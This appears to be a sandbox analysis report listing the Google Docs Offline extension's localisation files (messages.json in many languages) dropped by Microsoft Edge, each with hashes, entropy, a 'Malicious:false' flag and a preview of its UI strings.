                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir3952_298982013\CRX_INSTALL\_locales\be\messages.json

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):3107
                                                                                                                                                                                                                                                Entropy (8bit):3.535189746470889
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:48:YOWdTQ0QRk+QyJQAy6Qg4QWSe+QECTQLHQlQIfyQ0fnWQjQDrTQik+QvkZTQ+89b:GdTbyRvwgbCTEHQhyVues9oOT3rOCkV
                                                                                                                                                                                                                                                MD5:68884DFDA320B85F9FC5244C2DD00568
                                                                                                                                                                                                                                                SHA1:FD9C01E03320560CBBB91DC3D1917C96D792A549
                                                                                                                                                                                                                                                SHA-256:DDF16859A15F3EB3334D6241975CA3988AC3EAFC3D96452AC3A4AFD3644C8550
                                                                                                                                                                                                                                                SHA-512:7FF0FBD555B1F9A9A4E36B745CBFCAD47B33024664F0D99E8C080BE541420D1955D35D04B5E973C07725573E592CD0DD84FDBB867C63482BAFF6929ADA27CCDE
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:{"createnew":{"message":"\u0421\u0422\u0412\u0410\u0420\u042b\u0426\u042c \u041d\u041e\u0412\u042b"},"explanationofflinedisabled":{"message":"\u0412\u044b \u045e \u043f\u0430\u0437\u0430\u0441\u0435\u0442\u043a\u0430\u0432\u044b\u043c \u0440\u044d\u0436\u044b\u043c\u0435. \u041a\u0430\u0431 \u043a\u0430\u0440\u044b\u0441\u0442\u0430\u0446\u0446\u0430 \u0414\u0430\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u043c\u0456 Google \u0431\u0435\u0437 \u043f\u0430\u0434\u043a\u043b\u044e\u0447\u044d\u043d\u043d\u044f \u0434\u0430 \u0456\u043d\u0442\u044d\u0440\u043d\u044d\u0442\u0443, \u043f\u0435\u0440\u0430\u0439\u0434\u0437\u0456\u0446\u0435 \u0434\u0430 \u043d\u0430\u043b\u0430\u0434 \u043d\u0430 \u0433\u0430\u043b\u043e\u045e\u043d\u0430\u0439 \u0441\u0442\u0430\u0440\u043e\u043d\u0446\u044b \u0414\u0430\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u045e Google \u0456 \u045e\u043a\u043b\u044e\u0447\u044b\u0446\u0435 \u0441\u0456\u043d\u0445\u0440\u0430\u043d\u0456\u0437\u0430\u0446\u044b\u044e

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir3952_298982013\CRX_INSTALL\_locales\bg\messages.json

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1389
                                                                                                                                                                                                                                                Entropy (8bit):4.561317517930672
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:1HAp1DQqUfZ+Yann08VOeadclUZbyMzZzsYvwUNn7nOyRK8/nn08V7:g1UTfZ+Ya08Uey3tflCRE08h
                                                                                                                                                                                                                                                MD5:2E6423F38E148AC5A5A041B1D5989CC0
                                                                                                                                                                                                                                                SHA1:88966FFE39510C06CD9F710DFAC8545672FFDCEB
                                                                                                                                                                                                                                                SHA-256:AC4A8B5B7C0B0DD1C07910F30DCFBDF1BCB701CFCFD182B6153FD3911D566C0E
                                                                                                                                                                                                                                                SHA-512:891FCDC6F07337970518322C69C6026896DD3588F41F1E6C8A1D91204412CAE01808F87F9F2DEA1754458D70F51C3CEF5F12A9E3FC011165A42B0844C75EC683
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": ".........".. },.. "explanationofflinedisabled": {.. "message": "...... .... .. .. .......... Google ......... ... ........ ......, ........ ........... . ......... ........ .. Google ......... . ........ ...... .............. ......... ..., ...... ..... ...... . .........".. },.. "explanationofflineenabled": {.. "message": "...... ..., .. ... ...... .. ........... ......... ....... ... .. ......... .....".. },.. "extdesc": {.. "message": "............, .......... . ............ ...... ........., .......... ....... . ........... . ...... .... ... ...... .. .........".. },..

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir3952_298982013\CRX_INSTALL\_locales\bn\messages.json

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1763
                                                                                                                                                                                                                                                Entropy (8bit):4.25392954144533
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:1HABGtNOtIyHmVd+q+3X2AFl2DhrR7FAWS9+SMzI8QVAEq8yB0XtfOyvU7D:oshmm/+H2Ml2DrFPS9+S99EzBd7D
                                                                                                                                                                                                                                                MD5:651375C6AF22E2BCD228347A45E3C2C9
                                                                                                                                                                                                                                                SHA1:109AC3A912326171D77869854D7300385F6E628C
                                                                                                                                                                                                                                                SHA-256:1DBF38E425C5C7FC39E8077A837DF0443692463BA1FBE94E288AB5A93242C46E
                                                                                                                                                                                                                                                SHA-512:958AA7CF645FAB991F2ECA0937BA734861B373FB1C8BCC001599BE57C65E0917F7833A971D93A7A6423C5F54A4839D3A4D5F100C26EFA0D2A068516953989F9D
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": ".... .... ....".. },.. "explanationofflinedisabled": {.. "message": ".... ....... ....... .... ......... ..... ..... Google ........ ....... ...., Google .......... ........ ....... ... ... .... ... .... ... ........... .... ....... .... ... ...... ..... .... .....".. },.. "explanationofflineenabled": {.. "message": ".... ....... ......, ...... .... .... ...... .......... ........ .... .. .... .... .... .... .......".. },.. "extdesc":

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir3952_298982013\CRX_INSTALL\_locales\ca\messages.json

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):930
                                                                                                                                                                                                                                                Entropy (8bit):4.569672473374877
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:1HASvggoSCBxNFT0sXuqgEHQ2fTq9blUJYUJaw9CBxejZFPLOjCSUuE44pMiiDat:1HAtqs+BEHGpURxSp1iUPWCAXtRKe
                                                                                                                                                                                                                                                MD5:D177261FFE5F8AB4B3796D26835F8331
                                                                                                                                                                                                                                                SHA1:4BE708E2FFE0F018AC183003B74353AD646C1657
                                                                                                                                                                                                                                                SHA-256:D6E65238187A430FF29D4C10CF1C46B3F0FA4B91A5900A17C5DFD16E67FFC9BD
                                                                                                                                                                                                                                                SHA-512:E7D730304AED78C0F4A78DADBF835A22B3D8114FB41D67B2B26F4FE938B572763D3E127B7C1C81EBE7D538DA976A7A1E7ADC40F918F88AFADEA2201AE8AB47D0
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "CREA'N UN DE NOU".. },.. "explanationofflinedisabled": {.. "message": "No tens connexi.. Per utilitzar Documents de Google sense connexi. a Internet, ves a la configuraci. de la p.gina d'inici d'aquest servei i activa l'opci. per sincronitzar-se sense connexi. la propera vegada que estiguis connectat a la xarxa.".. },.. "explanationofflineenabled": {.. "message": "Tot i que no tens connexi., pots editar o crear fitxers.".. },.. "extdesc": {.. "message": "Edita, crea i consulta documents, fulls de c.lcul i presentacions, tot sense acc.s a Internet.".. },.. "extname": {.. "message": "Documents de Google sense connexi.".. },.. "learnmore": {.. "message": "M.s informaci.".. },.. "popuphelptext": {.. "message": "Escriu text, edita fitxers i col.labora-hi siguis on siguis, amb o sense connexi. a Internet.".. }..}..

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir3952_298982013\CRX_INSTALL\_locales\cs\messages.json

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):913
                                                                                                                                                                                                                                                Entropy (8bit):4.947221919047
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:1HASvgdsbCBxNBmobXP15Dxoo60n40h6qCBxeBeGG/9jZCSUKFPDLZ2B2hCBhPLm:1HApJmoZ5e50nzQhwAd7dvYB2kDSGGKs
                                                                                                                                                                                                                                                MD5:CCB00C63E4814F7C46B06E4A142F2DE9
                                                                                                                                                                                                                                                SHA1:860936B2A500CE09498B07A457E0CCA6B69C5C23
                                                                                                                                                                                                                                                SHA-256:21AE66CE537095408D21670585AD12599B0F575FF2CB3EE34E3A48F8CC71CFAB
                                                                                                                                                                                                                                                SHA-512:35839DAC6C985A6CA11C1BFF5B8B5E59DB501FCB91298E2C41CB0816B6101BF322445B249EAEA0CEF38F76D73A4E198F2B6E25EEA8D8A94EA6007D386D4F1055
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "VYTVO.IT".. },.. "explanationofflinedisabled": {.. "message": "Jste offline. Pokud chcete Dokumenty Google pou..vat bez p.ipojen. k.internetu, a. budete p...t. online, p.ejd.te do nastaven. na domovsk. str.nce Dokument. Google a.zapn.te offline synchronizaci.".. },.. "explanationofflineenabled": {.. "message": "Jste offline, ale st.le m..ete upravovat dostupn. soubory nebo vytv..et nov..".. },.. "extdesc": {.. "message": "Upravujte, vytv..ejte a.zobrazujte sv. dokumenty, tabulky a.prezentace . v.e bez p..stupu k.internetu.".. },.. "extname": {.. "message": "Dokumenty Google offline".. },.. "learnmore": {.. "message": "Dal.. informace".. },.. "popuphelptext": {.. "message": "Pi.te, upravujte a.spolupracujte kdekoli, s.p.ipojen.m k.internetu i.bez n.j.".. }..}..

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir3952_298982013\CRX_INSTALL\_locales\cy\messages.json

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):806
                                                                                                                                                                                                                                                Entropy (8bit):4.815663786215102
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:YGo35xMxy6gLr4Dn1eBVa1xzxyn1VFQB6FDVgdAJex9QH7uy+XJEjENK32J21j:Y735+yoeeRG54uDmdXx9Q7u3r83Xj
                                                                                                                                                                                                                                                MD5:A86407C6F20818972B80B9384ACFBBED
                                                                                                                                                                                                                                                SHA1:D1531CD0701371E95D2A6BB5EDCB79B949D65E7C
                                                                                                                                                                                                                                                SHA-256:A482663292A913B02A9CDE4635C7C92270BF3C8726FD274475DC2C490019A7C9
                                                                                                                                                                                                                                                SHA-512:D9FBF675514A890E9656F83572208830C6D977E34D5744C298A012515BC7EB5A17726ADD0D9078501393BABD65387C4F4D3AC0CC0F7C60C72E09F336DCA88DE7
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:{"createnew":{"message":"CREU NEWYDD"},"explanationofflinedisabled":{"message":"Rydych chi all-lein. I ddefnyddio Dogfennau Google heb gysylltiad \u00e2'r rhyngrwyd, ewch i'r gosodiadau ar dudalen hafan Dogfennau Google a throi 'offine sync' ymlaen y tro nesaf y byddwch wedi'ch cysylltu \u00e2'r rhyngrwyd."},"explanationofflineenabled":{"message":"Rydych chi all-lein, ond gallwch barhau i olygu'r ffeiliau sydd ar gael neu greu rhai newydd."},"extdesc":{"message":"Gallwch olygu, creu a gweld eich dogfennau, taenlenni a chyflwyniadau \u2013 i gyd heb fynediad i'r rhyngrwyd."},"extname":{"message":"Dogfennau Google All-lein"},"learnmore":{"message":"DYSGU MWY"},"popuphelptext":{"message":"Ysgrifennwch, golygwch a chydweithiwch lle bynnag yr ydych, gyda chysylltiad \u00e2'r rhyngrwyd neu hebddo."}}.

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir3952_298982013\CRX_INSTALL\_locales\da\messages.json

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):883
                                                                                                                                                                                                                                                Entropy (8bit):4.5096240460083905
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:1HA4EFkQdUULMnf1yo+9qgpukAXW9bGJTvDyqdr:zEFkegfw9qwAXWNs/yu
                                                                                                                                                                                                                                                MD5:B922F7FD0E8CCAC31B411FC26542C5BA
                                                                                                                                                                                                                                                SHA1:2D25E153983E311E44A3A348B7D97AF9AAD21A30
                                                                                                                                                                                                                                                SHA-256:48847D57C75AF51A44CBF8F7EF1A4496C2007E58ED56D340724FDA1604FF9195
                                                                                                                                                                                                                                                SHA-512:AD0954DEEB17AF04858DD5EC3D3B3DA12DFF7A666AF4061DEB6FD492992D95DB3BAF751AB6A59BEC7AB22117103A93496E07632C2FC724623BB3ACF2CA6093F3
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "OPRET NYT".. },.. "explanationofflinedisabled": {.. "message": "Du er offline. Hvis du vil bruge Google Docs uden en internetforbindelse, kan du g. til indstillinger p. startsiden for Google Docs og aktivere offlinesynkronisering, n.ste gang du har internetforbindelse.".. },.. "explanationofflineenabled": {.. "message": "Du er offline, men du kan stadig redigere tilg.ngelige filer eller oprette nye.".. },.. "extdesc": {.. "message": "Rediger, opret og se dine dokumenter, regneark og pr.sentationer helt uden internetadgang.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "F. flere oplysninger".. },.. "popuphelptext": {.. "message": "Skriv, rediger og samarbejd, uanset hvor du er, og uanset om du har internetforbindelse.".. }..}..

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir3952_298982013\CRX_INSTALL\_locales\de\messages.json

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1031
                                                                                                                                                                                                                                                Entropy (8bit):4.621865814402898
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:1HA6sZnqWd77ykJzCkhRhoe1HMNaAJPwG/p98HKpy2kX/R:WZqWxykJzthRhoQma+tpyHX2O/R
                                                                                                                                                                                                                                                MD5:D116453277CC860D196887CEC6432FFE
                                                                                                                                                                                                                                                SHA1:0AE00288FDE696795CC62FD36EABC507AB6F4EA4
                                                                                                                                                                                                                                                SHA-256:36AC525FA6E28F18572D71D75293970E0E1EAD68F358C20DA4FDC643EEA2C1C5
                                                                                                                                                                                                                                                SHA-512:C788C3202A27EC220E3232AE25E3C855F3FDB8F124848F46A3D89510C564641A2DFEA86D5014CEA20D3D2D3C1405C96DBEB7CCAD910D65C55A32FDCA8A33FDD4
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "NEU ERSTELLEN".. },.. "explanationofflinedisabled": {.. "message": "Sie sind offline. Um Google Docs ohne Internetverbindung zu verwenden, gehen Sie auf der Google Docs-Startseite auf \"Einstellungen\" und schalten die Offlinesynchronisierung ein, wenn Sie das n.chste Mal mit dem Internet verbunden sind.".. },.. "explanationofflineenabled": {.. "message": "Sie sind offline, aber k.nnen weiterhin verf.gbare Dateien bearbeiten oder neue Dateien erstellen.".. },.. "extdesc": {.. "message": "Mit der Erweiterung k.nnen Sie Dokumente, Tabellen und Pr.sentationen bearbeiten, erstellen und aufrufen.. ganz ohne Internetverbindung.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Weitere Informationen".. },.. "popuphelptext": {.. "message": "Mit oder ohne Internetverbindung: Sie k.nnen von .berall Dokumente erstellen, .ndern und zusammen mit anderen

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir3952_298982013\CRX_INSTALL\_locales\el\messages.json

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1613
                                                                                                                                                                                                                                                Entropy (8bit):4.618182455684241
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:1HAJKan4EITDZGoziRAc2Z8eEfkTJfLhGX7b0UBNoAcGpVyhxefSmuq:SKzTD0IK85JlwsGOUyaSk
                                                                                                                                                                                                                                                MD5:9ABA4337C670C6349BA38FDDC27C2106
                                                                                                                                                                                                                                                SHA1:1FC33BE9AB4AD99216629BC89FBB30E7AA42B812
                                                                                                                                                                                                                                                SHA-256:37CA6AB271D6E7C9B00B846FDB969811C9CE7864A85B5714027050795EA24F00
                                                                                                                                                                                                                                                SHA-512:8564F93AD8485C06034A89421CE74A4E719BBAC865E33A7ED0B87BAA80B7F7E54B240266F2EDB595DF4E6816144428DB8BE18A4252CBDCC1E37B9ECC9F9D7897
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": ".......... ....".. },.. "explanationofflinedisabled": {.. "message": "..... ..... ......... ... .. ............... .. ....... Google ..... ....... ... ........., ......... .... ......... .... ...... ...... ... ........ Google ... ............. ... ........... ..... ........ ... ....... .... ... .. ..... ............ ... ..........".. },.. "explanationofflineenabled": {.. "message": "..... ..... ........ .... ........ .. .............. .. ......... ...... . .. ............. ... .......".. },.. "extdesc": {.. "message": ".............., ............ ... ..... .. ......., .

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir3952_298982013\CRX_INSTALL\_locales\en\messages.json

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):851
                                                                                                                                                                                                                                                Entropy (8bit):4.4858053753176526
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:1HASvgg4eCBxNdN3Pj1NzXW6iFryCBxesJGceKCSUuvNn3AwCBhUufz1tHaXRdAv:1HA3dj/BNzXviFrpj4sNQXJezAa6
                                                                                                                                                                                                                                                MD5:07FFBE5F24CA348723FF8C6C488ABFB8
                                                                                                                                                                                                                                                SHA1:6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
                                                                                                                                                                                                                                                SHA-256:6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
                                                                                                                                                                                                                                                SHA-512:7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir3952_298982013\CRX_INSTALL\_locales\en_CA\messages.json

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):851
                                                                                                                                                                                                                                                Entropy (8bit):4.4858053753176526
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:1HASvgg4eCBxNdN3Pj1NzXW6iFryCBxesJGceKCSUuvNn3AwCBhUufz1tHaXRdAv:1HA3dj/BNzXviFrpj4sNQXJezAa6
                                                                                                                                                                                                                                                MD5:07FFBE5F24CA348723FF8C6C488ABFB8
                                                                                                                                                                                                                                                SHA1:6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
                                                                                                                                                                                                                                                SHA-256:6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
                                                                                                                                                                                                                                                SHA-512:7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir3952_298982013\CRX_INSTALL\_locales\en_GB\messages.json

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):848
                                                                                                                                                                                                                                                Entropy (8bit):4.494568170878587
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:1HASvgg4eCBxNdN3vRyc1NzXW6iFrSCBxesJGceKCSUuvlvOgwCBhUufz1tnaXrQ:1HA3djfR3NzXviFrJj4sJXJ+bA6RM
                                                                                                                                                                                                                                                MD5:3734D498FB377CF5E4E2508B8131C0FA
                                                                                                                                                                                                                                                SHA1:AA23E39BFE526B5E3379DE04E00EACBA89C55ADE
                                                                                                                                                                                                                                                SHA-256:AB5CDA04013DCE0195E80AF714FBF3A67675283768FFD062CF3CF16EDB49F5D4
                                                                                                                                                                                                                                                SHA-512:56D9C792954214B0DE56558983F7EB7805AC330AF00E944E734340BE41C68E5DD03EDDB17A63BC2AB99BDD9BE1F2E2DA5BE8BA7C43D938A67151082A9041C7BA
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an Internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the Internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create and view your documents, spreadsheets and presentations . all without Internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn more".. },.. "popuphelptext": {.. "message": "Write, edit and collaborate wherever you are, with or without an Internet connection.".. }..}..

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir3952_298982013\CRX_INSTALL\_locales\en_US\messages.json

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1425
                                                                                                                                                                                                                                                Entropy (8bit):4.461560329690825
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:1HA6Krbbds5Kna/BNzXviFrpsCxKU4irpNQ0+qWK5yOJAaCB7MAa6:BKrbBs5Kna/BNzXvi3sCxKZirA0jWK5m
                                                                                                                                                                                                                                                MD5:578215FBB8C12CB7E6CD73FBD16EC994
                                                                                                                                                                                                                                                SHA1:9471D71FA6D82CE1863B74E24237AD4FD9477187
                                                                                                                                                                                                                                                SHA-256:102B586B197EA7D6EDFEB874B97F95B05D229EA6A92780EA8544C4FF1E6BC5B1
                                                                                                                                                                                                                                                SHA-512:E698B1A6A6ED6963182F7D25AC12C6DE06C45D14499DDC91E81BDB35474E7EC9071CFEBD869B7D129CB2CD127BC1442C75E408E21EB8E5E6906A607A3982B212
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:{.. "createNew": {.. "description": "Text shown in the extension pop up for creating a new document",.. "message": "CREATE NEW".. },.. "explanationOfflineDisabled": {.. "description": "Text shown in the extension popup when the user is offline and offline is disabled.",.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationOfflineEnabled": {.. "description": "Text shown in the extension popup when the user is offline and offline is enabled.",.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extDesc": {.. "description": "Extension description",.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extName": {.. "description": "Extension name",..

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir3952_298982013\CRX_INSTALL\_locales\es\messages.json

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):961
                                                                                                                                                                                                                                                Entropy (8bit):4.537633413451255
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:1HASvggeCBxNFxcw2CVcfamedatqWCCBxeFxCF/m+rWAaFQbCSUuExqIQdO06stp:1HAqn0gcfa9dc/5mCpmIWck02USfWmk
                                                                                                                                                                                                                                                MD5:F61916A206AC0E971CDCB63B29E580E3
                                                                                                                                                                                                                                                SHA1:994B8C985DC1E161655D6E553146FB84D0030619
                                                                                                                                                                                                                                                SHA-256:2008F4FAAB71AB8C76A5D8811AD40102C380B6B929CE0BCE9C378A7CADFC05EB
                                                                                                                                                                                                                                                SHA-512:D9C63B2F99015355ACA04D74A27FD6B81170750C4B4BE7293390DC81EF4CD920EE9184B05C61DC8979B6C2783528949A4AE7180DBF460A2620DBB0D3FD7A05CF
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "CREAR".. },.. "explanationofflinedisabled": {.. "message": "No tienes conexi.n. Para usar Documentos de Google sin conexi.n a Internet, ve a Configuraci.n en la p.gina principal de Documentos de Google y activa la sincronizaci.n sin conexi.n la pr.xima vez que te conectes a Internet.".. },.. "explanationofflineenabled": {.. "message": "No tienes conexi.n. Aun as., puedes crear archivos o editar los que est.n disponibles.".. },.. "extdesc": {.. "message": "Edita, crea y consulta tus documentos, hojas de c.lculo y presentaciones; todo ello, sin acceso a Internet.".. },.. "extname": {.. "message": "Documentos de Google sin conexi.n".. },.. "learnmore": {.. "message": "M.s informaci.n".. },.. "popuphelptext": {.. "message": "Escribe o edita contenido y colabora con otras personas desde cualquier lugar, con o sin conexi.n a Internet.".. }..}..

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir3952_298982013\CRX_INSTALL\_locales\es_419\messages.json

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):959
                                                                                                                                                                                                                                                Entropy (8bit):4.570019855018913
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:1HARn05cfa9dcDmQOTtSprj0zaGUSjSGZ:+n0CfMcDmQOTQprj4qpC
                                                                                                                                                                                                                                                MD5:535331F8FB98894877811B14994FEA9D
                                                                                                                                                                                                                                                SHA1:42475E6AFB6A8AE41E2FC2B9949189EF9BBE09FB
                                                                                                                                                                                                                                                SHA-256:90A560FF82605DB7EDA26C90331650FF9E42C0B596CEDB79B23598DEC1B4988F
